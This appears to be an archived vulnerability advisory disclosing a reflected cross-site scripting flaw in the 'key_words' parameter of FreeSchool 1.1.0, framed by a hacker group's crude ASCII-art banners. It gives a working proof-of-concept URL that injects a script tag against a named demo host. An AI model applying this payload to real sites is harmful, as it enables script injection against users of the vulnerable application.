FreeSchool 1.1.0 cross site scripting vulnerability

2009.10.15

Credit: null

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

  __  __  __
 (__)(__)(__)
(__)(__)(__)| D R U N K E N
|  ||  ||  || D A N I S H
|  ||  ||  |' R E D N E C K S
'--''--''--'
  __  __  __
 (__)(__)(__) RESEARCH AND FUCKING HACKING:
(__)(__)(__)| DRUNKEN DANISH REDNECKS
|  ||  ||  || !!!!!!!
|  ||  ||  |' drunken.danish.rednecks@gmail.com
'--''--''--'

 [=]  FREESCHOOL 1.1.0 XSS (FUCK SCHOOL!!!)
 | |  "key_words" PARMETER IN INDEX.PHP
 }@{  http://fsdemo.istruzionego.eu/biblioteca/index.php?action=bib_searchs&method=searchs&key_words=redneck%22%27%3E%3Cscript%3Ealert(1)%3C/script%3E
/   \ FREESCHOOL 1.1.0 XSS
:___; "key_words" PARMETER IN INDEX.PHP
|&&&| FREESCHOOL 1.1.0 XSS
|&&&| "key_words" PARMETER IN INDEX.PHP
|---| FREESCHOOL 1.1.0 XSS
'---' "key_words" PARMETER IN INDEX.PHP
  __  __  __
 (__)(__)(__)
(__)(__)(__)| **ALCOHOL** + **HEAVY METAL** + **JACKASS**
|  ||  ||  ||
|  ||  ||  |' SINCE 2003!!!! BUUUUURP!!!!!!
'--''--''--'

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

FreeSchool 1.1.0 cross site scripting vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.